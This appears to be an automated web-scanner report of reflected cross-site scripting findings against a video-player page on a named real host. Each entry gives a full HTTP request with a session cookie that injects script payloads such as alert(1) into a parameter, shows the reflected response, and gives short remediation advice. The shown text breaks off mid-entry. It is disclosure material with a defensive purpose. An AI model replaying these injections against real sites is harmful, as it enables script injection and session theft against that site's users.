GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal684e9</script><script>alert(1)</script>6557bf3be13&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... /javascript"> var ua = navigator.userAgent.toLowerCase(); var allowFullScreen = "1"; var allowStf = "0"; var assetColor = ""; var assetLoadedTimeout; var controlsType = "internal684e9</script><script>alert(1)</script>6557bf3be13"; var cStyle = "5"; var defaultLeftMargin = 0; var domain = "http://iad.bigpondvideo.com/"; var initParams; var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1; var i ...[SNIP]...
The value of the controls request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3</script><script>alert(1)</script>3f649bd5bf8 was submitted in the controls parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internaledce3</script><script>alert(1)</script>3f649bd5bf8&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4804</script><script>alert(1)</script>9cb378d7e3b was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.comd4804</script><script>alert(1)</script>9cb378d7e3b&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the environment request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4900</script><script>alert(1)</script>29e14056bb3 was submitted in the environment parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iadc4900</script><script>alert(1)</script>29e14056bb3&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the errorFontColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8784</script><script>alert(1)</script>f26df97d870 was submitted in the errorFontColor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFFd8784</script><script>alert(1)</script>f26df97d870&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the errorFontSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af0a</script><script>alert(1)</script>6d9e149d8df was submitted in the errorFontSize parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=143af0a</script><script>alert(1)</script>6d9e149d8df&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the flv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2706</script><script>alert(1)</script>9dd3ace55d5 was submitted in the flv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0e2706</script><script>alert(1)</script>9dd3ace55d5&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the fontColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70de1</script><script>alert(1)</script>b2b49afedce was submitted in the fontColor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=66666670de1</script><script>alert(1)</script>b2b49afedce&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the fontSize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5655a</script><script>alert(1)</script>7c5218c05bd was submitted in the fontSize parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=145655a</script><script>alert(1)</script>7c5218c05bd&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the fullScreen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79bef</script><script>alert(1)</script>16230c5dc6b was submitted in the fullScreen parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=179bef</script><script>alert(1)</script>16230c5dc6b&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the fullScreen request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7657f</script><script>alert(1)</script>6330f087c0e was submitted in the fullScreen parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=17657f</script><script>alert(1)</script>6330f087c0e&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... <script type="text/javascript"> var ua = navigator.userAgent.toLowerCase(); var allowFullScreen = "17657f</script><script>alert(1)</script>6330f087c0e"; var allowStf = "0"; var assetColor = ""; var assetLoadedTimeout; var controlsType = "internal"; var cStyle = "5"; var defaultLeftMargin = 0; var domain = "http://iad.bigpon ...[SNIP]...
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30e71"><script>alert(1)</script>48343e38125 was submitted in the height parameter. This input was echoed as 30e71\"><script>alert(1)</script>48343e38125 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=27230e71"><script>alert(1)</script>48343e38125&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5512c</script><script>alert(1)</script>f9052c80859 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=2725512c</script><script>alert(1)</script>f9052c80859&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the height request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f301</script><script>alert(1)</script>9ee1b4dec9 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=2722f301</script><script>alert(1)</script>9ee1b4dec9&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the height request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83e38%3balert(1)//66ff03f0f1a was submitted in the height parameter. This input was echoed as 83e38;alert(1)//66ff03f0f1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=27283e38%3balert(1)//66ff03f0f1a&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the holdingImgDefault request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35d54</script><script>alert(1)</script>c562e631428 was submitted in the holdingImgDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
